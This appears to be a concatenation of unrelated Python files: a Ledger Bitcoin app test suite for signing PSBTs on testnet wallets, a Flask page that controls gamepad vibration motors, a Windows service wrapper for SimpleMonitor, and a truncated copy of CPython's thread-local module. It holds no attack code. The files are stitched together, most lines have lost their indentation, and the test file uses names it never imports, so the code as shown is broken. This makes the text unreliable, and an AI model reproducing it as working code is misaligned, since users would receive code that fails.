from bitcoin_client.ledger_bitcoin import Client, PolicyMapWallet, MultisigWallet, AddressType
from bitcoin_client.ledger_bitcoin.exception.errors import IncorrectDataError, NotSupportedError
from bitcoin_client.ledger_bitcoin.psbt import PSBT
from bitcoin_client.ledger_bitcoin.wallet import AddressType
from speculos.client import SpeculosClient
from test_utils import automation, bip0340, txmaker
from embit.script import Script
from embit.networks import NETWORKS
tests_root: Path = Path(__file__).parent
CURRENCY_TICKER = "TEST"
def format_amount(ticker: str, amount: int) -> str:
"""Formats an amounts in sats as shown in the app: divided by 10_000_000, with no trailing zeroes."""
assert amount >= 0
return f"{ticker} {str(Decimal(amount) / 100_000_000)}"
def should_go_right(event: dict):
"""Returns true if the current text event implies a "right" button press to proceed."""
if event["text"].startswith("Review"):
return True
elif event["text"].startswith("Amount"):
return True
elif event["text"].startswith("Address"):
return True
elif event["text"].startswith("Confirm"):
return True
elif event["text"].startswith("Fees"):
return True
return False
def ux_thread_sign_psbt(speculos_client: SpeculosClient, all_events: List[dict]):
"""Completes the signing flow always going right and accepting at the appropriate time, while collecting all the events in all_events."""
# press right until the last screen (will press the "right" button more times than needed)
while True:
event = speculos_client.get_next_event()
all_events.append(event)
if should_go_right(event):
speculos_client.press_and_release("right")
elif event["text"] == "Approve":
speculos_client.press_and_release("both")
elif event["text"] == "Accept":
speculos_client.press_and_release("both")
break
def parse_signing_events(events: List[dict]) -> dict:
ret = dict()
# each of these is True if the _previous_ event was matching (so the next text needs to be recorded)
was_amount = False
was_address = False
was_fees = False
cur_output_index = -1
ret["addresses"] = []
ret["amounts"] = []
ret["fees"] = ""
for ev in events:
if ev["text"].startswith("output #"):
idx_str = ev["text"][8:]
assert int(idx_str) - 1 == cur_output_index + 1 # should not skip outputs
cur_output_index = int(idx_str) - 1
ret["addresses"].append("")
ret["amounts"].append("")
if was_address:
ret["addresses"][-1] += ev["text"]
if was_amount:
ret["amounts"][-1] += ev["text"]
if was_fees:
ret["fees"] += ev["text"]
was_amount = ev["text"].startswith("Amount")
was_address = ev["text"].startswith("Address")
was_fees = ev["text"].startswith("Fees")
return ret
def open_psbt_from_file(filename: str) -> PSBT:
raw_psbt_base64 = open(filename, "r").read()
psbt = PSBT()
psbt.deserialize(raw_psbt_base64)
return psbt
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_pkh_1to1(client: Client):
# PSBT for a legacy 1-input 1-output spend (no change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/pkh-1to1.psbt")
wallet = PolicyMapWallet(
"",
"pkh(@0)",
[
"[f5acc2fd/44'/1'/0']tpubDCwYjpDhUdPGP5rS3wgNg13mTrrjBuG8V9VpWbyptX6TRPbNoZVXsoVUSkCjmQ8jJycjuDKBb9eataSymXakTTaGifxR6kmVsfFehH1ZgJT/**"
],
)
# expected sigs:
# #0:
# "pubkey" : "02ee8608207e21028426f69e76447d7e3d5e077049f5e683c3136c2314762a4718",
# "signature" : "3045022100e55b3ca788721aae8def2eadff710e524ffe8c9dec1764fdaa89584f9726e196022012a30fbcf9e1a24df31a1010356b794ab8de438b4250684757ed5772402540f401"
result = client.sign_psbt(psbt, wallet, None)
assert result == {
0: bytes.fromhex(
"3045022100e55b3ca788721aae8def2eadff710e524ffe8c9dec1764fdaa89584f9726e196022012a30fbcf9e1a24df31a1010356b794ab8de438b4250684757ed5772402540f401"
)
}
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_sh_wpkh_1to2(client: Client):
# PSBT for a wrapped segwit 1-input 2-output spend (1 change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/sh-wpkh-1to2.psbt")
wallet = PolicyMapWallet(
"",
"sh(wpkh(@0))",
[
"[f5acc2fd/49'/1'/0']tpubDC871vGLAiKPcwAw22EjhKVLk5L98UGXBEcGR8gpcigLQVDDfgcYW24QBEyTHTSFEjgJgbaHU8CdRi9vmG4cPm1kPLmZhJEP17FMBdNheh3/**"
],
)
# expected sigs:
# #0:
# "pubkey" : "024ba3b77d933de9fa3f9583348c40f3caaf2effad5b6e244ece8abbfcc7244f67",
# "signature" : "30440220720722b08489c2a50d10edea8e21880086c8e8f22889a16815e306daeea4665b02203fcf453fa490b76cf4f929714065fc90a519b7b97ab18914f9451b5a4b45241201"
result = client.sign_psbt(psbt, wallet, None)
assert result == {
0: bytes.fromhex(
"30440220720722b08489c2a50d10edea8e21880086c8e8f22889a16815e306daeea4665b02203fcf453fa490b76cf4f929714065fc90a519b7b97ab18914f9451b5a4b45241201"
)
}
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_wpkh_1to2(client: Client):
    # PSBT for a native segwit 1-input 2-output spend (1 change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/wpkh-1to2.psbt")
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
result = client.sign_psbt(psbt, wallet, None)
# expected sigs
# #0:
# "pubkey" : "03ee2c3d98eb1f93c0a1aa8e5a4009b70eb7b44ead15f1666f136b012ad58d3068",
# "signature" : "3045022100ab44f34dd7e87c9054591297a101e8500a0641d1d591878d0d23cf8096fa79e802205d12d1062d925e27b57bdcf994ecf332ad0a8e67b8fe407bab2101255da632aa01"
assert result == {
0: bytes.fromhex(
"3045022100ab44f34dd7e87c9054591297a101e8500a0641d1d591878d0d23cf8096fa79e802205d12d1062d925e27b57bdcf994ecf332ad0a8e67b8fe407bab2101255da632aa01"
)
}
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_wpkh_2to2(client: Client):
    # PSBT for a native segwit 2-input 2-output spend (1 change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/wpkh-2to2.psbt")
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
result = client.sign_psbt(psbt, wallet, None)
# expected sigs
# #0:
# "pubkey" : "03455ee7cedc97b0ba435b80066fc92c963a34c600317981d135330c4ee43ac7a3",
# "signature" : "304402206b3e877655f08c6e7b1b74d6d893a82cdf799f68a5ae7cecae63a71b0339e5ce022019b94aa3fb6635956e109f3d89c996b1bfbbaf3c619134b5a302badfaf52180e01"
# #1:
# "pubkey" : "0271b5b779ad870838587797bcf6f0c7aec5abe76a709d724f48d2e26cf874f0a0",
# "signature" : "3045022100e2e98e4f8c70274f10145c89a5d86e216d0376bdf9f42f829e4315ea67d79d210220743589fd4f55e540540a976a5af58acd610fa5e188a5096dfe7d36baf3afb94001"
assert result == {
0: bytes.fromhex(
"304402206b3e877655f08c6e7b1b74d6d893a82cdf799f68a5ae7cecae63a71b0339e5ce022019b94aa3fb6635956e109f3d89c996b1bfbbaf3c619134b5a302badfaf52180e01"
),
1: bytes.fromhex(
"3045022100e2e98e4f8c70274f10145c89a5d86e216d0376bdf9f42f829e4315ea67d79d210220743589fd4f55e540540a976a5af58acd610fa5e188a5096dfe7d36baf3afb94001"
),
}
# def test_sign_psbt_legacy(client: Client):
# # legacy address
# # PSBT for a legacy 1-input 1-output spend
# unsigned_raw_psbt_base64 = "cHNidP8BAFQCAAAAAbUlIwxFfIt0fsuFCNtL3dHKcOvUPQu2CNcqc8FrNtTyAAAAAAD+////AaDwGQAAAAAAGKkU2FZEFTTPb1ZpCw2Oa2sc/FxM59GIrAAAAAAAAQD5AgAAAAABATfphYFskBaL7jbWIkU3K7RS5zKr5BvfNHjec1rNieTrAQAAABcWABTkjiMSrvGNi5KFtSy72CSJolzNDv7///8C/y8bAAAAAAAZdqkU2FZEFTTPb1ZpCw2Oa2sc/FxM59GIrDS2GJ0BAAAAF6kUnEFiBqwsbP0pWpazURx45PGdXkWHAkcwRAIgCxWs2+R6UcpQuD6QKydU0irJ7yNe++5eoOly5VgqrEsCIHUD6t4LNW0292vnP+heXZ6Walx8DRW2TB+IOazzDNcaASEDnQS6zdUebuNm7FuOdKonnlNmPPpUyN66w2CIsX5N+pUhIh4AAAA="
# psbt = PSBT()
# psbt.deserialize(unsigned_raw_psbt_base64)
# result = client.sign_psbt(psbt)
# print(result)
# def test_sign_psbt_legacy_p2pkh(client: Client):
# # test from app-bitcoin
# # legacy address
# # PSBT for a legacy 1-input, 1-output + 1-change address spend
# unsigned_raw_psbt_base64 = 'cHNidP8BAHcBAAAAAVf4kTUeYOlEcY8d8StPd7ZCzGMUYYS+3Gx7xkoMCzneAAAAAAAAAAAAAqCGAQAAAAAAGXapFHrmeHmDxejS4X7xcPdZBWw2A6fYiKygfAEAAAAAABl2qRQYm4Or/V0O+Y+/NZTJXMU7RJdK6oisAAAAAAABAOICAAAAAV33ueIMUtHaJwGiRKSXVCFSZvAW9r139kClIAzR+340AQAAAGtIMEUCIQDIBpV0KZNcXWH1SCI8NTbcc5/jUYFLzp7cFpTlpcJavwIgE+MHsLSIWstkzP+vX0eU8gUEAyXrw2wlh4fEiLA4wrsBIQOLpGLX3WWRfs5FQUKQO7NioLQS0YQdUgh62IFka2zcz/3///8CFAwDAAAAAAAZdqkUs+F8Te+KORSO1vrX3G/r4w3TJMuIrDBXBQAAAAAAGXapFOCok4BjXxi37glUbZYyMry5kkEriKz+BB0AAQMEAQAAAAAAAA=='
# # expected sig: 3044022012f6a643d1d1a558912e0935dbd6a9694fe87c841e0f699c7cbb7c818503c115022064585f9b69c3452183a74ee7f00ae0452139e2c73b156dfd6ac835bea4fdf975
# psbt = PSBT()
# psbt.deserialize(unsigned_raw_psbt_base64)
# result = client.sign_psbt(psbt)
# print(result)
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_multisig_wsh(client: Client):
wallet = MultisigWallet(
name="Cold storage",
address_type=AddressType.WIT,
threshold=2,
keys_info=[
f"[76223a6e/48'/1'/0'/2']tpubDE7NQymr4AFtewpAsWtnreyq9ghkzQBXpCZjWLFVRAvnbf7vya2eMTvT2fPapNqL8SuVvLQdbUbMfWLVDCZKnsEBqp6UK93QEzL8Ck23AwF/**",
f"[f5acc2fd/48'/1'/0'/2']tpubDFAqEGNyad35aBCKUAXbQGDjdVhNueno5ZZVEn3sQbW5ci457gLR7HyTmHBg93oourBssgUxuWz1jX5uhc1qaqFo9VsybY1J5FuedLfm4dK/**",
],
)
wallet_hmac = bytes.fromhex(
"d6434852fb3caa7edbd1165084968f1691444b3cfc10cf1e431acbbc7f48451f"
)
psbt = open_psbt_from_file(f"{tests_root}/psbt/multisig/wsh-2of2.psbt")
result = client.sign_psbt(psbt, wallet, wallet_hmac)
assert result == {
0: bytes.fromhex(
"304402206ab297c83ab66e573723892061d827c5ac0150e2044fed7ed34742fedbcfb26e0220319cdf4eaddff63fc308cdf53e225ea034024ef96de03fd0939b6deeea1e8bd301"
)
}
# def test_sign_psbt_legacy_wrong_non_witness_utxo(client: Client):
# # legacy address
# # PSBT for a legacy 1-input 1-output spend
# # The spend is valid, but the non-witness utxo is wrong; therefore, it should fail the hash test
# # TODO: this fails PSBT decoding; need to make a version we can control for this test.
# unsigned_raw_psbt_base64 = "cHNidP8BAFQCAAAAAbUlIwxFfIt0fsuFCNtL3dHKcOvUPQu2CNcqc8FrNtTyAAAAAAD+////AaDwGQAAAAAAGKkU2FZEFTTPb1ZpCw2Oa2sc/FxM59GIrAAAAAAAAQD5AgAAAAABATfphYFskBaL7jbWIkU3K7RS5zKr5BvfNHjec1rNieTrAQAAABcWABTkjiMSrvGNi5KFtSy72CSJolzNDv7///8C/y8bAAAAAAAZdqkU2FZEFTTPb1ZpCw2Oa2sc/FxM59GIrDS2GJ0BAAAAF6kUnEFiBqwsbP0pWpazURx45PGdXkWHAkcwRAIgCxWs2+R6UcpQuD6QKydU0irJ7yNe++5eoOly5VgqrEsCIHUD6t4LNW0292vnP+heXZ6Walx8DRW2TB+IOazzDNcaASEDnQS6zdUebuNm7FuOdKonnlNmPPpUyN66w2CIsX5N+pUySC0BAAA="
# psbt = PSBT()
# psbt.deserialize(unsigned_raw_psbt_base64)
# with pytest.raises(IncorrectDataError):
# client.sign_psbt(psbt)
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_taproot_1to2(client: Client):
# PSBT for a p2tr 1-input 2-output spend (1 change address)
psbt = open_psbt_from_file(f"{tests_root}/psbt/singlesig/tr-1to2.psbt")
wallet = PolicyMapWallet(
"",
"tr(@0)",
[
"[f5acc2fd/86'/1'/0']tpubDDKYE6BREvDsSWMazgHoyQWiJwYaDDYPbCFjYxN3HFXJP5fokeiK4hwK5tTLBNEDBwrDXn8cQ4v9b2xdW62Xr5yxoQdMu1v6c7UDXYVH27U/**"
],
)
result = client.sign_psbt(psbt, wallet, None)
    # Unlike the ECDSA signatures above, Schnorr signatures are not deterministic (unless the randomness is removed)
# Therefore, for this testcase we hard-code the sighash (which was validated with Bitcoin Core 22.0 when the
# transaction was sent), and we verify the produced Schnorr signature with the reference bip340 implementation.
# sighash verified with bitcoin-core
sighash0 = bytes.fromhex("7A999E5AD6F53EA6448E7026061D3B4523F957999C430A5A492DFACE74AE31B6")
# get the (tweaked) pubkey from the scriptPubKey
pubkey0 = psbt.inputs[0].witness_utxo.scriptPubKey[2:]
assert len(result) == 1
# the sighash 0x01 is appended to the signature
assert len(result[0]) == 64+1
assert result[0][-1] == 0x01
sig0 = result[0][:-1]
assert bip0340.schnorr_verify(sighash0, pubkey0, sig0)
def test_sign_psbt_singlesig_wpkh_4to3(client: Client, comm: SpeculosClient, is_speculos: bool):
# PSBT for a segwit 4-input 3-output spend (1 change address)
# this test also checks that addresses, amounts and fees shown on screen are correct
if not is_speculos:
pytest.skip("Requires speculos")
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
n_ins = 4
n_outs = 3
in_amounts = [10000 + 10000 * i for i in range(n_ins)]
out_amounts = [9999 + 9999 * i for i in range(n_outs)]
change_index = 1
psbt = txmaker.createPsbt(
wallet,
in_amounts,
out_amounts,
[i == change_index for i in range(n_outs)]
)
sum_in = sum(in_amounts)
sum_out = sum(out_amounts)
assert sum_out < sum_in
fees_amount = sum_in - sum_out
all_events: List[dict] = []
x = threading.Thread(target=ux_thread_sign_psbt, args=[comm, all_events])
x.start()
result = client.sign_psbt(psbt, wallet, None)
x.join()
assert len(result) == n_ins
parsed_events = parse_signing_events(all_events)
assert(parsed_events["fees"] == format_amount(CURRENCY_TICKER, fees_amount))
shown_out_idx = 0
for out_idx in range(n_outs):
if out_idx != change_index:
out_amt = psbt.tx.vout[out_idx].nValue
assert parsed_events["amounts"][shown_out_idx] == format_amount(CURRENCY_TICKER, out_amt)
out_addr = Script(psbt.tx.vout[out_idx].scriptPubKey).address(network=NETWORKS["test"])
assert parsed_events["addresses"][shown_out_idx] == out_addr
shown_out_idx += 1
@automation("automations/sign_with_wallet_accept.json")
def test_sign_psbt_singlesig_wpkh_64to256(client: Client, enable_slow_tests: bool):
# PSBT for a transaction with 64 inputs and 256 outputs (maximum currently supported in the app)
# Very slow test (esp. with DEBUG enabled), so disabled unless the --enableslowtests option is used
if not enable_slow_tests:
pytest.skip()
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
psbt = txmaker.createPsbt(
wallet,
[10000 + 10000 * i for i in range(64)],
[999 + 99 * i for i in range(255)],
[i == 42 for i in range(255)]
)
result = client.sign_psbt(psbt, wallet, None)
assert len(result) == 64
def test_sign_psbt_fail_11_changes(client: Client):
# PSBT for transaction with 11 change addresses; the limit is 10, so it must fail with NotSupportedError
# before any user interaction
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
psbt = txmaker.createPsbt(
wallet,
[11 * 100_000_000 + 1234],
[100_000_000] * 11,
[True] * 11,
)
with pytest.raises(NotSupportedError):
client.sign_psbt(psbt, wallet, None)
def test_sign_psbt_fail_wrong_non_witness_utxo(client: Client, is_speculos: bool):
# PSBT for transaction with the wrong non-witness utxo for an input.
# It must fail with IncorrectDataError before any user interaction.
if not is_speculos:
pytest.skip("Requires speculos")
wallet = PolicyMapWallet(
"",
"wpkh(@0)",
[
"[f5acc2fd/84'/1'/0']tpubDCtKfsNyRhULjZ9XMS4VKKtVcPdVDi8MKUbcSD9MJDyjRu1A2ND5MiipozyyspBT9bg8upEp7a8EAgFxNxXn1d7QkdbL52Ty5jiSLcxPt1P/**"
],
)
psbt = txmaker.createPsbt(
wallet,
[3 * 100_000_000],
[1 * 100_000_000, 2 * 100_000_000],
[False, True]
)
    # Modify the non_witness_utxo so that the txid no longer matches
wit = psbt.inputs[0].non_witness_utxo
    wit.nLockTime = wit.nLockTime ^ 1  # flip one bit of nLockTime arbitrarily to change the txid
wit.rehash()
psbt.inputs[0].non_witness_utxo = wit
client._no_clone_psbt = True
with pytest.raises(IncorrectDataError):
client.sign_psbt(psbt, wallet, None)
client._no_clone_psbt = False
|
main.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
from flask import Flask, render_template_string, request, jsonify
app = Flask(__name__)
import logging
logging.basicConfig(level=logging.DEBUG)
import sys
sys.path.append('..')
from rumble import set_vibration
@app.route("/")
def index():
return render_template_string('''\
<html>
<head>
<meta content='text/html; charset=UTF-8' http-equiv='Content-Type'/>
<script type="text/javascript" src="{{ url_for('static', filename='js/jquery-3.1.1.min.js') }}"></script>
<!-- SOURCE: http://shpargalkablog.ru/2013/08/checked.html -->
<style>
#payt3 {display: none;}
[for="payt3"] {
position: relative;
display: block;
width: 100px;
height: 100px;
border-radius: 100%;
background: #ddd linear-gradient(#ccc, #fff);
box-shadow:
inset 0 2px 1px rgba(0,0,0,.15),
0 2px 5px rgba(200,200,200,.1);
cursor: pointer;
}
[for="payt3"]:after {
content: "";
position: absolute;
left: 40%; top: 40%;
width: 20%;
height: 20%;
border-radius: 100%;
background: #969696 radial-gradient(40% 35%, #ccc, #969696 60%);
box-shadow:
inset 0 2px 4px 1px rgba(0,0,0,.3),
0 1px 0 rgba(255,255,255,1),
inset 0 1px 0 white;
}
[for="payt3"]:before {
content: "";
position: absolute;
top: 8%; right: 8%; bottom: 8%; left: 8%;
border-radius: 100%;
background: #eaeaea;
box-shadow:
0 3px 5px rgba(0,0,0,.25),
inset 0 1px 0 rgba(255,255,255,.3),
inset 0 -5px 5px rgba(100,100,100,.1),
inset 0 5px 5px rgba(255,255,255,.3);
}
#payt3:checked ~ [for="payt3"]:before {
background: #e5e5e5 linear-gradient(#dedede, #fdfdfd);
}
#payt3:checked ~ [for="payt3"]:after {
background: #25d025 radial-gradient(40% 35%, #5aef5a, #25d025 60%);
box-shadow:
inset 0 3px 5px 1px rgba(0,0,0,.1),
0 1px 0 rgba(255,255,255,.4),
0 0 10px 2px rgba(0, 210, 0, .5);
}
</style>
</head>
<body>
<script>
function send_status() {
var left_motor = $('#left_motor').val();
var right_motor = $('#right_motor').val();
$('#left_motor_value').text(left_motor);
$('#right_motor_value').text(right_motor);
var data = {
enabled: $('#payt3').prop('checked'),
left_motor: left_motor,
right_motor: right_motor,
};
console.log("data = " + JSON.stringify(data));
$.ajax({
url: "/set_status",
method: "POST", // HTTP метод, по умолчанию GET
data: JSON.stringify(data),
contentType: "application/json",
dataType: "json", // тип данных загружаемых с сервера
success: function(data) {
console.log("success");
console.log(data);
},
error: function(data) {
console.log("error");
console.log(data);
}
});
}
$(document).ready(function() {
$.ajax({
url: "/get_status",
contentType: "application/json",
dataType: "json", // тип данных загружаемых с сервера
success: function(data) {
console.log("success");
console.log(data);
$('#payt3').prop('checked', data.enabled)
$('#left_motor').val(data.left_motor);
$('#right_motor').val(data.right_motor);
$('#left_motor_value').text(data.left_motor);
$('#right_motor_value').text(data.right_motor);
},
error: function(data) {
console.log("error");
console.log(data);
}
});
});
</script>
<table>
<tr>
<td colspan="2" style="text-align: center;">Rumble / Vibration</td>
</tr>
<tr>
<td colspan="2">
<input type="checkbox" id="payt3" oninput="send_status();"/>
<label align="center" for="payt3"></label>
</td>
</tr>
<tr><td>Left motor:</td><td>Right motor:</td></tr>
<tr>
<td><input id="left_motor" type="range" min="0" max="65535" step="1" value="0" onchange="send_status();"></td>
<td><input id="right_motor" type="range" min="0" max="65535" step="1" value="0" onchange="send_status();"></td>
</tr>
<tr>
<td id="left_motor_value" style="text-align: center;">0</td>
<td id="right_motor_value" style="text-align: center;">0</td>
</tr>
</table>
</body>
</html>''')
# For debugging the ENABLED, LEFT_MOTOR and RIGHT_MOTOR state
DEBUG = False
ENABLED = False
LEFT_MOTOR = 0
RIGHT_MOTOR = 0
@app.route("/set_status", methods=['POST'])
def set_status():
print('set_status')
data = request.get_json()
print(data)
global ENABLED, LEFT_MOTOR, RIGHT_MOTOR
if 'enabled' in data and 'left_motor' in data and 'right_motor' in data:
ENABLED = data['enabled']
LEFT_MOTOR = int(data['left_motor'])
RIGHT_MOTOR = int(data['right_motor'])
return jsonify(data)
@app.route("/get_status")
def get_status():
print('get_status')
data = {
'enabled': ENABLED,
'left_motor': LEFT_MOTOR,
'right_motor': RIGHT_MOTOR,
}
print(data)
return jsonify(data)
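# Example client calls (a sketch; assumes Flask's default port 5000 and that the
# `requests` package is installed -- neither is part of this script):
#
#   import requests
#   requests.post("http://localhost:5000/set_status",
#                 json={"enabled": True, "left_motor": 30000, "right_motor": 0})
#   print(requests.get("http://localhost:5000/get_status").json())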
def vibration_tick():
while True:
if DEBUG:
print('ENABLED: {} ({}), LEFT_MOTOR: {}, RIGHT_MOTOR: {}'.format(
ENABLED, type(ENABLED), LEFT_MOTOR, RIGHT_MOTOR,
))
if ENABLED:
set_vibration(LEFT_MOTOR, RIGHT_MOTOR)
else:
set_vibration(0, 0)
import time
time.sleep(0.1)
if __name__ == "__main__":
import threading
t = threading.Thread(target=vibration_tick)
t.start()
# # Localhost
# # app.debug = True
# app.run(
# # OR: host='127.0.0.1'
# host='192.168.0.102',
# port=10000,
#
# # # Enable support for multiple connections
# # threaded=True,
# )
# # Public IP
app.run(host='0.0.0.0')
|
winmonitor.py
|
import win32serviceutil
import win32service
import win32event
import socket
import os
import logging
import sys
import multiprocessing as mp
r"""
Notes:
This service expects the 'monitor.ini' file to exist in the same directory.
If you receive an error "The service did not respond to the start
or control request in a timely fashion", it is likely/possible you need to
include the python and pywin32 binaries in your path:
e.g. (from an administrator prompt)
setx /M PATH "%PATH%;c:\Python;c:\Python\scripts;c:\Python\Lib\site-packages\pywin32_system32;c:\Python\Lib\site-packages\win32"
"""
# Change this to the location of your config file, if required
APP_PATH = os.path.realpath(os.path.dirname(__file__))
CONFIG = os.path.join(APP_PATH, 'monitor.ini')
LOGFILE = os.path.join(APP_PATH, 'simplemonitor.log')
# Setup Logging
def configure_logger(logger, level=logging.DEBUG):
logger.setLevel(level)
fh = logging.FileHandler(LOGFILE)
fh.setLevel(level)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
fh.setFormatter(formatter)
logger.addHandler(fh)
return logger
def setup_logger(level=logging.DEBUG):
return configure_logger(mp.get_logger(), level)
LOGGER = setup_logger(logging.INFO)
class AppServerSvc (win32serviceutil.ServiceFramework):
_svc_name_ = "SimpleMonitor"
_svc_display_name_ = "SimpleMonitor"
_svc_description_ = "A service wrapper for the python SimpleMonitor program"
def __init__(self, args):
# Initialise service
win32serviceutil.ServiceFramework.__init__(self, args)
self.hWaitStop = win32event.CreateEvent(None, 0, 0, None)
socket.setdefaulttimeout(60)
# Setup logger
self.logger = LOGGER
self.logger.info("Initialised {} service".format(self._svc_display_name_))
def SvcStop(self):
self.logger.info("Stopping {} service".format(self._svc_display_name_))
self.ReportServiceStatus(win32service.SERVICE_STOP_PENDING)
win32event.SetEvent(self.hWaitStop)
def SvcDoRun(self):
self.logger.info("Starting {} service".format(self._svc_display_name_))
import servicemanager
        servicemanager.LogMsg(servicemanager.EVENTLOG_INFORMATION_TYPE,
                              servicemanager.PYS_SERVICE_STARTED,
                              (self._svc_name_, ''))
# Start monitor
p_mon = mp.Process(target=run_monitor)
p_mon.start()
self.logger.info("Started {} service".format(self._svc_display_name_))
# Wait for Monitor to finish
while True:
try:
# Watch monitor process for 2 seconds
p_mon.join(timeout=2)
                if not p_mon.is_alive():
                    self.logger.warning("Monitor process exited prematurely; stopping service.")
                    self.SvcStop()
# Check if we've received a stop command
rc = win32event.WaitForSingleObject(self.hWaitStop, 500)
if rc == win32event.WAIT_OBJECT_0:
p_mon.terminate()
p_mon.join()
break
self.logger.debug("Still running...")
except KeyboardInterrupt:
self.logger.warning("Interrupted {} service".format(self._svc_display_name_))
break
self.logger.info("Stopped {} service".format(self._svc_display_name_))
def run_monitor():
import monitor
sys.argv = ['monitor.py', "-vH", "--config={}".format(CONFIG)]
monitor.main()
if __name__ == '__main__':
win32serviceutil.HandleCommandLine(AppServerSvc)
|
_threading_local.py
|
"""Thread-local objects.
(Note that this module provides a Python version of the threading.local
class. Depending on the version of Python you're using, there may be a
faster one available. You should always import the `local` class from
`threading`.)
Thread-local objects support the management of thread-local data.
If you have data that you want to be local to a thread, simply create
a thread-local object and use its attributes:
>>> mydata = local()
>>> mydata.number = 42
>>> mydata.number
42
You can also access the local-object's dictionary:
>>> mydata.__dict__
{'number': 42}
>>> mydata.__dict__.setdefault('widgets', [])
[]
>>> mydata.widgets
[]
What's important about thread-local objects is that their data are
local to a thread. If we access the data in a different thread:
>>> log = []
>>> def f():
... items = sorted(mydata.__dict__.items())
... log.append(items)
... mydata.number = 11
... log.append(mydata.number)
>>> import threading
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[], 11]
we get different data. Furthermore, changes made in the other thread
don't affect data seen in this thread:
>>> mydata.number
42
Of course, values you get from a local object, including a __dict__
attribute, are for whatever thread was current at the time the
attribute was read. For that reason, you generally don't want to save
these values across threads, as they apply only to the thread they
came from.
You can create custom local objects by subclassing the local class:
>>> class MyLocal(local):
... number = 2
... def __init__(self, **kw):
... self.__dict__.update(kw)
... def squared(self):
... return self.number ** 2
This can be useful to support default values, methods and
initialization. Note that if you define an __init__ method, it will be
called each time the local object is used in a separate thread. This
is necessary to initialize each thread's dictionary.
Now if we create a local object:
>>> mydata = MyLocal(color='red')
Now we have a default number:
>>> mydata.number
2
an initial color:
>>> mydata.color
'red'
>>> del mydata.color
And a method that operates on the data:
>>> mydata.squared()
4
As before, we can access the data in a separate thread:
>>> log = []
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
>>> log
[[('color', 'red')], 11]
without affecting this thread's data:
>>> mydata.number
2
>>> mydata.color
Traceback (most recent call last):
...
AttributeError: 'MyLocal' object has no attribute 'color'
Note that subclasses can define slots, but they are not thread
local. They are shared across threads:
>>> class MyLocal(local):
... __slots__ = 'number'
>>> mydata = MyLocal()
>>> mydata.number = 42
>>> mydata.color = 'red'
So, the separate thread:
>>> thread = threading.Thread(target=f)
>>> thread.start()
>>> thread.join()
affects what we see:
>>> mydata.number
11
>>> del mydata
"""
from weakref import ref
from contextlib import contextmanager
__all__ = ["local"]
# We need to use objects from the threading module, but the threading
# module may also want to use our `local` class, if support for locals
# isn't compiled in to the `thread` module. This creates potential problems
# with circular imports. For that reason, we don't import `threading`
# until the bottom of this file (a hack sufficient to worm around the
# potential problems). Note that all platforms on CPython do have support
# for locals in the `thread` module, and there is no circular import problem
# then, so problems introduced by fiddling the order of imports here won't
# manifest.
class _localimpl:
"""A class managing thread-local dicts"""
__slots__ = 'key', 'dicts', 'localargs', 'locallock', '__weakref__'
def __init__(self):
# The key used in the Thread objects' attribute dicts.
# We keep it a string for speed but make it unlikely to clash with
# a "real" attribute.
self.key = '_threading_local._localimpl.' + str(id(self))
# { id(Thread) -> (ref(Thread), thread-local dict) }
self.dicts = {}
def get_dict(self):
"""Return the dict for the current thread. Raises KeyError if none
defined."""
thread = current_thread()
return self.dicts[id(thread)][1]
def create_dict(self):
"""Create a new dict for the current thread, and return it."""
localdict = {}
key = self.key
thread = current_thread()
idt = id(thread)
def local_deleted(_, key=key):
# When the localimpl is deleted, remove the thread attribute.
thread = wrthread()
if thread is not None:
del thread.__dict__[key]
def thread_deleted(_, idt=idt):
# When the thread is deleted, remove the local dict.
# Note that this is suboptimal if the thread object gets
# caught in a reference loop. We would like to be called
# as soon as the OS-level thread ends instead.
local = wrlocal()
if local is not None:
dct = local.dicts.pop(idt)
wrlocal = ref(self, local_deleted)
wrthread = ref(thread, thread_deleted)
thread.__dict__[key] = wrlocal
self.dicts[idt] = wrthread, localdict
return localdict
@contextmanager
def _patch(self):
impl = object.__getattribute__(self, '_local__impl')
try:
dct = impl.get_dict()
except KeyError:
dct = impl.create_dict()
args, kw = impl.localargs
